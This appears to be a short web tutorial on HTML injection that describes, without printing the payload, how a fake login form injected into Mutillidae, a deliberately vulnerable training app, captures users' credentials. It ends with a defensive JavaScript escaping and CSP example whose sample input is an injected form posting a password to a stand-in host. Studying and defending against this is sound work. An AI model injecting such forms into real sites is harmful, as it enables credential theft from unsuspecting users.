How to hack mostly websites with HTML Injection in 3 minutes.

Hacking website - HTML Injection


HTML Injection
HTML injection is a vulnerability in web applications that allows users to insert HTML code through an entry point such as a specific parameter. This type of attack can be combined with social engineering to trick valid users of the application into opening malicious websites, or into entering their credentials in a fake login form that redirects them to a page that captures cookies and credentials. In this tutorial we are going to see how this vulnerability can be exploited once it is discovered. For the purposes of this article, Mutillidae will be used as the vulnerable application.


Vulnerable Form
Of course, in this example there is an indication that this form accepts HTML tags, as that is part of the functionality of the application. An attacker will reason that he can exploit the users of this application if he sets up a page on his server that captures their cookies and credentials. With such a page in place, he can trick users into entering their credentials by injecting a fake HTML login form into the vulnerable page. Mutillidae already has a data capture page, so we are going to use that page for this tutorial.
Mutillidae – Data Capture Page
Injecting HTML Code – Fake Login
Now we can inject HTML code that will cause the application to load a fake login form.

Injecting HTML Code – Fake Login
Fake Login Form
Every user who enters his credentials will be redirected to another page where his credentials will be stored. In this case the credentials can be found at the data capture page and we can see them below:



As we saw in this article, HTML injection vulnerabilities are very easy to exploit and can have a large impact, as any user of the web application can be a target. System admins must take appropriate measures for their web applications in order to prevent these types of attacks.
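
One way to apply such measures to a field that is meant to accept some HTML, like the blog form above, is to encode all input and then restore only a short allowlist of attribute-free formatting tags. This is an added example, not code from Mutillidae or from the original post; the function names, the tag allowlist and the sample input are assumptions made for illustration.

```javascript
// Added example: output handling for a field that intentionally accepts
// some HTML, such as a blog entry. All names here are hypothetical.

const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode every character that can start or alter markup.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Formatting tags the application chooses to keep (assumed list).
const ALLOWED_TAGS = ["b", "i", "u", "em", "strong"];
const ALLOWED_RE = new RegExp(`&lt;(/?)(${ALLOWED_TAGS.join("|")})&gt;`, "gi");

// Escape everything first, then restore only exact, attribute-free
// allowlisted tags. Anything else (form, input, script, or a tag that
// carries attributes) stays encoded and is displayed as plain text.
function renderEntry(userText) {
  return escapeHtml(userText).replace(
    ALLOWED_RE,
    (_match, slash, tag) => `<${slash}${tag.toLowerCase()}>`
  );
}

// The unsafe pattern for comparison: input concatenated into the page as-is.
function renderEntryUnsafe(userText) {
  return `<div class="entry">${userText}</div>`;
}

// Defence in depth: a Content-Security-Policy that only lets forms on the
// page submit to the application's own origin.
function responseHeaders() {
  return { "Content-Security-Policy": "form-action 'self'" };
}

// Constructed sample input: allowed formatting plus an injected form.
const sample =
  'Nice <b>post</b><form action="https://other.example/"><input name="password"></form>';

console.log(renderEntryUnsafe(sample)); // form markup reaches the browser intact
console.log(`<div class="entry">${renderEntry(sample)}</div>`); // form shown as text
console.log(responseHeaders());
```

Escaping before restoring the allowlist means the default for any unrecognised tag is to stay inert, so a new HTML element or attribute does not silently become accepted input.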
